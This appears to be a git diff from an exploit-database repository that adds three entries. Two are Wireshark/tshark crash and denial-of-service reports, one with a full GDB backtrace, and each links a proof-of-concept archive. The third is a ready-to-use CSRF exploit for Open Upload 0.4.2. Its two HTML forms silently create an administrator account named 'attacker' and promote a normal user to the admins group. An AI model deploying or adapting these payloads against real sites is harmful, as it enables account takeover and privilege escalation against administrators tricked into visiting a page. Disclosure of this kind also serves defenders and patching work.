Fuzzed PCAP takes 100% CPU and runs for a long time on tshark 2.0.2 and a recent build from repository ( commit 688d055acd523e645c1e87267dcf4a0a9867adbd ).
|
||||
|
||||
GDB backtrace from 'tshark -2 -V -r <pcap>' aborted after running for a while:
|
||||
|
||||
Program received signal SIGABRT, Aborted.
|
||||
0x00007ffff45bb676 in rlc_decode_li (mode=RLC_AM, tvb=0x9342c0, pinfo=0xb04c18, tree=0x0, li=0x7fffffffbab0, max_li=16 '\020', li_on_2_bytes=0) at packet-rlc.c:1722
|
||||
1722 next_bytes = li_on_2_bytes ? tvb_get_ntohs(tvb, hdr_len) : tvb_get_guint8(tvb, hdr_len);
|
||||
123 tomb gdb execution "thread apply all bt" 321
|
||||
|
||||
Thread 1 (Thread 0x7ffff7fb9740 (LWP 1578)):
|
||||
#0 0x00007ffff45bb676 in rlc_decode_li (mode=RLC_AM, tvb=0x9342c0, pinfo=0xb04c18, tree=0x0, li=0x7fffffffbab0, max_li=16 '\020', li_on_2_bytes=0) at packet-rlc.c:1722
|
||||
#1 0x00007ffff45bde04 in dissect_rlc_am (channel=RLC_UL_DCCH, tvb=0x9342c0, pinfo=0xb04c18, top_level=0x0, tree=0x0, atm=0x0) at packet-rlc.c:2308
|
||||
#2 0x00007ffff45be82a in dissect_rlc_dcch (tvb=0x9342c0, pinfo=0xb04c18, tree=0x0, data=0x0) at packet-rlc.c:2477
|
||||
#3 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffedb08f50, tvb=0x9342c0, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:660
|
||||
#4 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffedb08f50, tvb=0x9342c0, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x0) at packet.c:735
|
||||
#5 0x00007ffff3cadd25 in call_dissector_only (handle=0x7fffedb08f50, tvb=0x9342c0, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:2791
|
||||
#6 0x00007ffff3cadd68 in call_dissector_with_data (handle=0x7fffedb08f50, tvb=0x9342c0, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:2804
|
||||
#7 0x00007ffff47e7679 in dissect_mac_fdd_dch (tvb=0xb0ac50, pinfo=0xb04c18, tree=0x0, data=0x0) at packet-umts_mac.c:564
|
||||
#8 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffedb13b70, tvb=0xb0ac50, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:660
|
||||
#9 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffedb13b70, tvb=0xb0ac50, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x0) at packet.c:735
|
||||
#10 0x00007ffff3cadd25 in call_dissector_only (handle=0x7fffedb13b70, tvb=0xb0ac50, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:2791
|
||||
#11 0x00007ffff3cadd68 in call_dissector_with_data (handle=0x7fffedb13b70, tvb=0xb0ac50, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:2804
|
||||
#12 0x00007ffff47dab2e in dissect_tb_data (tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, offset=3, p_fp_info=0x7fffeca74180, data_handle=0x7ffff7aae8e8 <mac_fdd_dch_handle>, data=0x0) at packet-umts_fp.c:815
|
||||
#13 0x00007ffff47decbb in dissect_dch_channel_info (tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, offset=3, p_fp_info=0x7fffeca74180, data=0x0) at packet-umts_fp.c:2557
|
||||
#14 0x00007ffff47e476e in dissect_fp_common (tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, data=0x0) at packet-umts_fp.c:4419
|
||||
#15 0x00007ffff47e4add in dissect_fp (tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, data=0x0) at packet-umts_fp.c:4507
|
||||
#16 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffeda51580, tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:660
|
||||
#17 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffeda51580, tvb=0xb0ac00, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x0) at packet.c:735
|
||||
#18 0x00007ffff3cadd25 in call_dissector_only (handle=0x7fffeda51580, tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:2791
|
||||
#19 0x00007ffff3c99819 in try_conversation_dissector (addr_a=0xb04cf0, addr_b=0xb04cd8, ptype=PT_UDP, port_a=65359, port_b=8040, tvb=0xb0ac00, pinfo=0xb04c18, tree=0x0, data=0x0) at conversation.c:1323
|
||||
#20 0x00007ffff47d3839 in decode_udp_ports (tvb=0x848b70, offset=8, pinfo=0xb04c18, tree=0x0, uh_sport=8040, uh_dport=65359, uh_ulen=3554) at packet-udp.c:541
|
||||
#21 0x00007ffff47d5e21 in dissect (tvb=0x848b70, pinfo=0xb04c18, tree=0x0, ip_proto=17) at packet-udp.c:1080
|
||||
#22 0x00007ffff47d5e79 in dissect_udp (tvb=0x848b70, pinfo=0xb04c18, tree=0x0, data=0x7fffec869030) at packet-udp.c:1086
|
||||
#23 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffedb13330, tvb=0x848b70, pinfo=0xb04c18, tree=0x0, data=0x7fffec869030) at packet.c:660
|
||||
#24 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffedb13330, tvb=0x848b70, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x7fffec869030) at packet.c:735
|
||||
#25 0x00007ffff3cab583 in dissector_try_uint_new (sub_dissectors=0x7b1cc0, uint_val=17, tvb=0x848b70, pinfo=0xb04c18, tree=0x0, add_proto_name=1, data=0x7fffec869030) at packet.c:1199
|
||||
#26 0x00007ffff425e409 in ip_try_dissect (heur_first=0, tvb=0x848b70, pinfo=0xb04c18, tree=0x0, iph=0x7fffec869030) at packet-ip.c:1977
|
||||
#27 0x00007ffff426037c in dissect_ip_v4 (tvb=0x848b20, pinfo=0xb04c18, parent_tree=0x0, data=0x0) at packet-ip.c:2476
|
||||
#28 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffedb78930, tvb=0x848b20, pinfo=0xb04c18, tree=0x0, data=0x0) at packet.c:660
|
||||
#29 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffedb78930, tvb=0x848b20, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x0) at packet.c:735
|
||||
#30 0x00007ffff3cab583 in dissector_try_uint_new (sub_dissectors=0x73c040, uint_val=2048, tvb=0x848b20, pinfo=0xb04c18, tree=0x0, add_proto_name=1, data=0x0) at packet.c:1199
|
||||
#31 0x00007ffff3cab5e4 in dissector_try_uint (sub_dissectors=0x73c040, uint_val=2048, tvb=0x848b20, pinfo=0xb04c18, tree=0x0) at packet.c:1225
|
||||
#32 0x00007ffff40a1c60 in dissect_ethertype (tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffcc20) at packet-ethertype.c:262
|
||||
#33 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffeda50000, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffcc20) at packet.c:660
|
||||
#34 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffeda50000, tvb=0xb03d20, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x7fffffffcc20) at packet.c:735
|
||||
#35 0x00007ffff3cadd25 in call_dissector_only (handle=0x7fffeda50000, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffcc20) at packet.c:2791
|
||||
#36 0x00007ffff3cadd68 in call_dissector_with_data (handle=0x7fffeda50000, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffcc20) at packet.c:2804
|
||||
#37 0x00007ffff40a04d5 in dissect_eth_common (tvb=0xb03d20, pinfo=0xb04c18, parent_tree=0x0, fcs_len=-1) at packet-eth.c:540
|
||||
#38 0x00007ffff40a106b in dissect_eth (tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0xad6928) at packet-eth.c:836
|
||||
#39 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffedb5c7a0, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0xad6928) at packet.c:660
|
||||
#40 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffedb5c7a0, tvb=0xb03d20, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0xad6928) at packet.c:735
|
||||
#41 0x00007ffff3cab583 in dissector_try_uint_new (sub_dissectors=0x73c2c0, uint_val=1, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, add_proto_name=1, data=0xad6928) at packet.c:1199
|
||||
#42 0x00007ffff40e9887 in dissect_frame (tvb=0xb03d20, pinfo=0xb04c18, parent_tree=0x0, data=0x7fffffffd380) at packet-frame.c:507
|
||||
#43 0x00007ffff3caa711 in call_dissector_through_handle (handle=0x7fffeda51950, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffd380) at packet.c:660
|
||||
#44 0x00007ffff3caa8a2 in call_dissector_work (handle=0x7fffeda51950, tvb=0xb03d20, pinfo_arg=0xb04c18, tree=0x0, add_proto_name=1, data=0x7fffffffd380) at packet.c:735
|
||||
#45 0x00007ffff3cadd25 in call_dissector_only (handle=0x7fffeda51950, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffd380) at packet.c:2791
|
||||
#46 0x00007ffff3cadd68 in call_dissector_with_data (handle=0x7fffeda51950, tvb=0xb03d20, pinfo=0xb04c18, tree=0x0, data=0x7fffffffd380) at packet.c:2804
|
||||
#47 0x00007ffff3caa079 in dissect_record (edt=0xb04c00, file_type_subtype=1, phdr=0xad68c0, tvb=0xb03d20, fd=0x7fffffffd550, cinfo=0x0) at packet.c:543
|
||||
#48 0x00007ffff3c9ebf9 in epan_dissect_run (edt=0xb04c00, file_type_subtype=1, phdr=0xad68c0, tvb=0xb03d20, fd=0x7fffffffd550, cinfo=0x0) at epan.c:365
|
||||
#49 0x000000000041844c in process_packet_first_pass (cf=0x64f100 <cfile>, edt=0xb04c00, offset=20928, whdr=0xad68c0, pd=0xb04e20 "4\a\373\024t,\320\320\375+\004\300\b") at tshark.c:2694
|
||||
#50 0x0000000000418dd7 in load_cap_file (cf=0x64f100 <cfile>, save_file=0x0, out_file_type=2, out_file_name_res=0, max_packet_count=-1, max_byte_count=0) at tshark.c:2988
|
||||
#51 0x0000000000416fa0 in main (argc=5, argv=0x7fffffffdda8) at tshark.c:1873
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40199.zip
|
||||
65
platforms/php/webapps/40193.txt
Executable file
65
platforms/php/webapps/40193.txt
Executable file
|
|
@ -0,0 +1,65 @@
|
|||
================================================================================================================
|
||||
Open Upload 0.4.2 Remote Admin Add CSRF Exploit and Changing Normal user permission
|
||||
================================================================================================================
|
||||
# Exploit Title : Open Upload 0.4.2 Remote Admin Add CSRF Exploit
|
||||
# Exploit Author : Vinesh Redkar (@b0rn2pwn)
|
||||
# Email : vineshredkar89[at]gmail[d0t]com
|
||||
# Date: 21/07/2016
|
||||
# Vendor Homepage: http://openupload.sourceforge.net/
|
||||
# Software Link: https://sourceforge.net/projects/openupload/
|
||||
# Version: 0.4.2
|
||||
# Tested on: Windows 10 OS
|
||||
|
||||
Open Upload Application is vulnerable to CSRF attack (No CSRF token in place) meaning
|
||||
that if an admin user can be tricked to visit a crafted URL created by
|
||||
attacker (via spear phishing/social engineering).
|
||||
|
||||
Once exploited, the attacker can login as the admin using the username and the password he posted in the form.
|
||||
|
||||
======================CSRF POC (Adding New user with Admin Privileges)==================================
|
||||
CSRF PoC Code
|
||||
<html>
|
||||
<head>
|
||||
<title>Remote Admin Add CSRF Exploit</title>
|
||||
</head>
|
||||
<H2>Remote Admin Add CSRF Exploit by b0rn2pwn</H2>
|
||||
<body>
|
||||
<form action="http://127.0.0.1/openupload/index.php" method="POST">
|
||||
<input type="hidden" name="action" value="adminusers" />
|
||||
<input type="hidden" name="step" value="2" />
|
||||
<input type="hidden" name="adduserlogin" value="attacker" />
|
||||
<input type="hidden" name="adduserpassword" value="attacker" />
|
||||
<input type="hidden" name="adduserrepassword" value="attacker" />
|
||||
<input type="hidden" name="addusername" value="attacker" />
|
||||
<input type="hidden" name="adduseremail" value="attacker@gmail.com" />
|
||||
<input type="hidden" name="addusergroup" value="admins" />
|
||||
<input type="hidden" name="adduserlang" value="en" />
|
||||
<input type="hidden" name="adduseractive" value="1" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
======================CSRF POC (Changing privileges from normal user to administer)==================================
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<title>Change privilege normal user to administer CSRF Exploit</title>
|
||||
</head>
|
||||
<H2>Change privilege normal user to administer CSRF Exploit by b0rn2pwn</H2>
|
||||
<body>
|
||||
<form action="http://127.0.0.1/openupload/index.php" method="POST">
|
||||
<input type="hidden" name="action" value="adminusers" />
|
||||
<input type="hidden" name="step" value="3" />
|
||||
<input type="hidden" name="login" value="normal user" />
|
||||
<input type="hidden" name="edituserpassword" value="" />
|
||||
<input type="hidden" name="edituserrepassword" value="" />
|
||||
<input type="hidden" name="editusername" value="normaluser" />
|
||||
<input type="hidden" name="edituseremail" value="normaluser@gmail.com" />
|
||||
<input type="hidden" name="editusergroup" value="admins" />
|
||||
<input type="hidden" name="edituserlang" value="en" />
|
||||
<input type="hidden" name="edituseractive" value="1" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
27
platforms/win_x86-64/dos/40196.txt
Executable file
27
platforms/win_x86-64/dos/40196.txt
Executable file
|
|
@ -0,0 +1,27 @@
|
|||
GIOP capture
|
||||
|
||||
Build Information:
|
||||
Version 2.0.3 (v2.0.3-0-geed34f0 from master-2.0)
|
||||
|
||||
Copyright 1998-2016 Gerald Combs <gerald@wireshark.org> and contributors.
|
||||
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
|
||||
This is free software; see the source for copying conditions. There is NO
|
||||
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
|
||||
|
||||
Compiled (64-bit) with Qt 5.3.2, with WinPcap (4_1_3), with libz 1.2.8, with
|
||||
GLib 2.42.0, with SMI 0.4.8, with c-ares 1.9.1, with Lua 5.2, with GnuTLS
|
||||
3.2.15, with Gcrypt 1.6.2, with MIT Kerberos, with GeoIP, with QtMultimedia,
|
||||
with AirPcap.
|
||||
|
||||
Running on 64-bit Windows 8.1, build 9600, with locale C, without WinPcap, with
|
||||
GnuTLS 3.2.15, with Gcrypt 1.6.2, without AirPcap.
|
||||
Intel(R) Core(TM) i5-2520M CPU @ 2.50GHz (with SSE4.2), with 16334MB of
|
||||
physical memory.
|
||||
|
||||
|
||||
Built using Microsoft Visual C++ 12.0 build 40629
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40196.zip
|
||||
|
||||
Loading…
Add table
Reference in a new issue